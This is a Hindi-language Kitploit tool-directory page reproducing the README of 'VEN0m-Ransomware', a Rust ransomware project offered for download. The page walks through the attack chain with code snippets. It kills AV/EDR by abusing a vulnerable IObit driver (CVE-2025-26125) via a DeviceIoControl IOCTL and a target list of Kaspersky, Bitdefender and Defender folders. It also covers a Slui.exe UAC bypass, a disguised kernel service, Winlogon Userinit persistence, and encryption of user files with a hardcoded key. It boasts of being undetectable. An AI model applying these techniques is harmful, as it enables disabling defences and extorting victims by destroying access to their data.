Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
VEN0m-Ransomware — पूरी तरह से अज्ञेय और चोरी-छिपे रैनसमवेयर, जो Rust में लिखा गया है और संक्रमित सिस्टम पर AV/EDR समाधानों को निष्क्रिय करने के लिए BYOVD तकनीक का लाभ उठाता है। | Kitploit
उपकरण/GitHubGitHub/xm0kht4r/ven0m-ransomware
विशेषाधिकार वृद्धिएन्क्रिप्शन/डिक्रिप्शन उपकरणस्थायित्व तंत्रशोषणआईडीएस/आईपीएस से बचनापोस्ट-शोषणमालवेयर विश्लेषणरेड टीमिंगपेलोड डेवलपमेंट
GitHubxm0kht4r/ven0m-ransomware

VEN0m-Ransomware

पूरी तरह से अज्ञेय और चोरी-छिपे रैनसमवेयर, जो Rust में लिखा गया है और संक्रमित सिस्टम पर AV/EDR समाधानों को निष्क्रिय करने के लिए BYOVD तकनीक का लाभ उठाता है।

36788127 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

VEN0m Ransomware

https://github.com/user-attachments/assets/5a1fc9b5-a647-41f6-a152-7b9d97381adc

यह प्रोजेक्ट दर्शाता है कि कैसे एक वैध और हस्ताक्षरित ड्राइवर को बचाव उपायों को चकमा देने और एक वास्तविक साइबर हमले का अनुकरण करते हुए रैनसमवेयर तैनात करने के लिए हथियार बनाया जा सकता है।

🚨 Windows 11 Pro 24H2 पर परीक्षण किया गया। प्रारंभिक रिलीज़ दिनांक: 02-23-2026 तक पूरी तरह से अज्ञात।*

चोरीUAC बाईपास
BitDefender✅✅
Kaspersky✅✅
MS Defender✅❌

प्रमुख विशेषताएं

AV/EDR चोरी:

VEN0m क्लासिक BYOVD तकनीक का उपयोग करता है, लेकिन AV-EDR-KILLER के विपरीत, जो एक कमजोर ड्राइवर का शोषण करता है जो कर्नेल फंक्शन ZwTerminateProcess को अविशेषाधिकार प्राप्त उपयोगकर्ताओं के लिए उजागर करता है, यह IObit Malware Fighter v12.1.0 में शामिल एक कमजोर ड्राइवर का लाभ उठाता है, जो काफी विडंबनापूर्ण है क्योंकि हम इसका उपयोग चोरी के लिए कर रहे हैं।

यहाँ प्रश्न में ड्राइवर IMFForceDelete.sys है, जो एक IOCTL को उजागर करता है जो अविशेषाधिकार प्राप्त उपयोगकर्ताओं को मनमानी फ़ाइलों को हटाने की अनुमति देता है। इस कमजोरी को CVE-2025-26125 के रूप में ट्रैक किया जाता है, और ड्राइवर अभी भी Microsoft की ब्लॉकलिस्ट में नहीं है।

मनमानी हटाने को ट्रिगर करने के लिए, हम IOCTL कोड 0x8016E000, लक्ष्य फ़ाइल का प्रतिनिधित्व करने वाले एक विस्तृत यूनिकोड स्ट्रिंग के लिए एक लंबे शून्य पॉइंटर, और कुल लंबाई को 2 से गुणा करके (क्योंकि wstr_file.len() u16 तत्वों की संख्या देता है और प्रत्येक तत्व 2 बाइट का होता है) u32 के रूप में डालकर API कॉलिंग कन्वेंशन के DWORD पैरामीटर में फिट होने के लिए DeviceIoControl API कॉल का आह्वान करते हैं।

> DeviceIoControl(hDriver, 0x8016E000, wstr_file.as_ptr() as LPVOID, (wstr_file.len() * 2) as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

[!NOTE]

+ ❓ AV-EDR-Killer कुछ AV/EDR उत्पादों के खिलाफ क्यों विफल रहा?

इसके पीछे मुख्य विचार एक ड्राइवर का शोषण करना था जिसमें असुरक्षित IOCTL हैं जो कर्नेल फंक्शन ZwTerminateProcess को उजागर करते हैं, जो किसी भी उपयोगकर्ता-मोड एप्लिकेशन को कर्नेल-स्तरीय समाप्ति क्षमताएं प्रदान करता है। इस तकनीक की कमजोरी यह है कि कुछ AV/EDR उत्पाद उक्त फंक्शन को हुक करते हैं और इस पर कॉल को रोक सकते हैं।

एक और उल्लेखनीय तकनीक एक निश्चित कमजोर ड्राइवर के मनमानी पढ़ने/लिखने के आदिम का शोषण करके मेमोरी को पैच करना और एक और भी शक्तिशाली समाप्ति फंक्शन, PsTerminateProcess पर कूदना था, जो ntoskrnl.exe द्वारा स्वयं निर्यात नहीं किया जाता है। यह भी बहुत संदिग्ध है क्योंकि होस्ट सुरक्षा उपाय लगातार मेमोरी को स्कैन कर रहे हैं। संदर्भ : https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/

+ नया क्या है?

हम बस डिस्क पर इंस्टॉलेशन फ़ोल्डर्स और एक्सिक्यूटेबल्स को काट-छाँट कर देते हैं। यह उतना ही सरल है!

यह अधिकांश सुरक्षा उत्पादों के लिए एक ब्लाइंड स्पॉट प्रतीत होता है, क्योंकि हम मेमोरी में हेरफेर करने या संदिग्ध कॉल करने के बजाय डिस्क पर फ़ाइलों को लक्षित कर रहे हैं। अपने IMFForceDelete.sys ड्राइवर का उपयोग करके, हम उच्च विशेषाधिकारों के साथ लॉक की गई फ़ाइलों को जबरन हटा सकते हैं। सीधे किसी AV या EDR उत्पाद पर हमला करना काउंटर-इंट्यूटिव लगता है, क्योंकि हमलावर आमतौर पर बचाव को चकमा देने के लिए चुपके से काम करना चाहते हैं, न कि उनका सामना करना।

इस तकनीक का उपयोग करके, हमने चल रही EDR/AV प्रक्रियाओं को तब तक दूषित किया जब तक कि वे धीरे-धीरे टूट नहीं गईं और ठीक से काम करना बंद नहीं कर दिया, जिससे तबाही मचाने और अपने पसंदीदा पेलोड, VEN0m को तैनात करने का द्वार खुल गया।

  • आप स्थिरांक TARGETS को संशोधित करके लक्ष्य AV/EDR की सूची का विस्तार या समायोजन कर सकते हैं:
const TARGETS: &[&str] = &[r"C:\Program Files (x86)\Kaspersky Lab", r"C:\Program Files\Bitdefender", r"C:\Program Files\Bitdefender Agent", r"C:\Program Files\Windows Defender",];

UAC बाईपास:

UAC संकेतों को बायपास करने के लिए, हम एक हस्ताक्षरित Microsoft बाइनरी Slui.exe के निष्पादन प्रवाह को हाईजैक कर रहे हैं जो स्वचालित-एलिवेशन का समर्थन करता है, बिना किसी प्रशासनिक संदर्भ में runas क्रिया के साथ आह्वान करने पर कोई संकेत ट्रिगर किए।

मुख्य शोषण तब होता है जब Slui.exe HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command के तहत एक गैर-मौजूद रजिस्ट्री कुंजी खोलने का प्रयास करता है। हम इस दोष का लाभ उठाकर गुम कुंजी बनाते हैं और वर्तमान पेलोड को इंगित करने वाला DelegateExecute सम्मिलित करते हैं ताकि निष्पादन को प्रतिनिधि बनाया जा सके। फिर हम ShellExecuteW API कॉल के साथ runas क्रिया के साथ Slui.exe के निष्पादन को ट्रिगर करते हैं, जिसके परिणामस्वरूप एक सफल UAC बाईपास होता है। पूर्ण कार्यान्वयन /src/uac.rs में पाया जा सकता है।

[!IMPORTANT] मुझे यकीन नहीं है कि क्या यह एक कमजोरी है जिसे रिपोर्ट किया जाना चाहिए। यदि हां, तो कृपया नीचे दिए गए ईमेल के माध्यम से मुझसे संपर्क करने में संकोच न करें।

ड्राइवर लोड करना:

चूंकि VEN0m UAC को बायपास कर रहा है और उच्च अखंडता में चल रहा है, यह एम्बेडेड ड्राइवर को अस्थायी फ़ोल्डर में निकालने और MicrosoftUpdate11.01 जैसे छिपे नामों के साथ एक कर्नेल सेवा बनाने को स्वचालित करता है। इसमें बहुत उपयोगी जांच शामिल हैं जैसे कि सेवा बंद होने पर उसे ऑटोस्टार्ट करना या यदि वह पहले से मौजूद है तो उसे बनाने से बचना।

स्थिरता:

होस्ट सुरक्षा उपायों को बेअसर करने के बाद, आप जो भी स्थिरता तकनीक चाहते हैं उसे चुन सकते हैं। मैंने एक सरल Winlogon Userinit तकनीक का उपयोग किया, जो HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon के तहत Userinit रजिस्ट्री कुंजी का लाभ उठाती है। डिफ़ॉल्ट रूप से, यह कुंजी userinit.exe को मान के रूप में निर्दिष्ट करती है, जो उपयोगकर्ता लॉगिन पर निष्पादित होकर उपयोगकर्ता वातावरण को आरंभ करता है। हालांकि, हम वैध userinit.exe से अल्पविराम द्वारा अलग किए गए अपने पेलोड पथ को जोड़कर इसे हाईजैक करते हैं, साथ ही %LOCALAPPDATA% में मैलवेयर की एक प्रति भी छोड़ते हैं।

एन्क्रिप्शन:

रैनसमवेयर निर्दिष्ट ड्राइव को लक्षित एक्सटेंशन वाली फ़ाइलों के लिए स्कैन करता है, जबकि एक बहिष्करण सूची के खिलाफ फ़िल्टर करता है। मिलान वाली फ़ाइलों को 32-बाइट हार्डकोडेड कुंजी का उपयोग करके एन्क्रिप्ट किया जाता है, और उनके एक्सटेंशन को .vnm में बदल दिया जाता है।

आप निम्नलिखित स्थिरांक को संशोधित करके व्यवहार को अनुकूलित कर सकते हैं:

  • KEY एन्क्रिप्शन कुंजी निर्दिष्ट करने के लिए:
const KEY: &[u8; 32] = b"G7m9Xq2vR4pL8bF1sW0cZ6kD3jN5yH8u";
  • XClUSIONS बहिष्कृत निर्देशिकाओं और फ़ोल्डरों को निर्दिष्ट करने के लिए:
const XClUSIONS: &[&str] = &["Windows", "Program Files", "Program Files (x86)", "ProgramData", "$Recycle.Bin", "All Users"];
  • XTENSIONS लक्ष्य एक्सटेंशन की सूची का विस्तार या समायोजन करने के लिए:
const XTENSIONS: &[&str] = &["pdf", "doc", "xlms", "png", "jpg", "jpeg", "txt", "mp4"];
  • DRV लक्ष्य ड्राइव निर्दिष्ट करने के लिए:
const DRV: &[&str] = &["C:\\", "D:\\", "E:\\", "F:\\"];

फिरौती नोट:

एन्क्रिप्शन पूरा करने पर, VEN0m डेस्कटॉप वॉलपेपर बदल देता है और डेस्कटॉप पर एक एक्जीक्यूटेबल फिरौती नोट छोड़ देता है। यह एक शेड्यूल्ड टास्क भी पंजीकृत करता है जो हर कुछ मिनटों में नोट GUI को लॉन्च करने के लिए चलता है, जो एक चमकदार खोपड़ी ☠️ प्रदर्शित करता है।

  • आप /assets/wallpaper.jpg को अपनी स्वयं की छवि से बदलकर वॉलपेपर को अनुकूलित कर सकते हैं।
  • आप /src/task.rs को संपादित करके शेड्यूल्ड टास्क गुणों को संशोधित कर सकते हैं।

डिक्रिप्शन उपकरण:

VEN0m में एक डिक्रिप्टर उपकरण Antid0te.exe🧪 भी शामिल है जो .vnm एक्सटेंशन वाली फ़ाइलों को स्कैन करता है और एन्क्रिप्शन के लिए निर्दिष्ट उसी कुंजी का उपयोग करके एन्क्रिप्शन रूटीन को उलट देता है।

[!WARNING] अपनी फ़ाइलों को Antid0te.exe डिक्रिप्टर का उपयोग करके डिक्रिप्ट करने में सक्षम होने के लिए अपनी एन्क्रिप्शन कुंजी को सहेजना महत्वपूर्ण है।

अनुकूलन:

VEN0m अत्यधिक मॉड्यूलर और अनुकूलन योग्य है। आप हार्डकोडेड स्थिरांक को संशोधित करके रैनसमवेयर के व्यवहार को बदल सकते हैं। आप इसे अपनी पसंद के विशेषाधिकार वृद्धि कमजोरी या पार्श्व आंदोलन तकनीक के साथ जोड़कर इसे अगले स्तर पर ले जा सकते हैं :)

उपयोग:

टूल डाउनलोड करें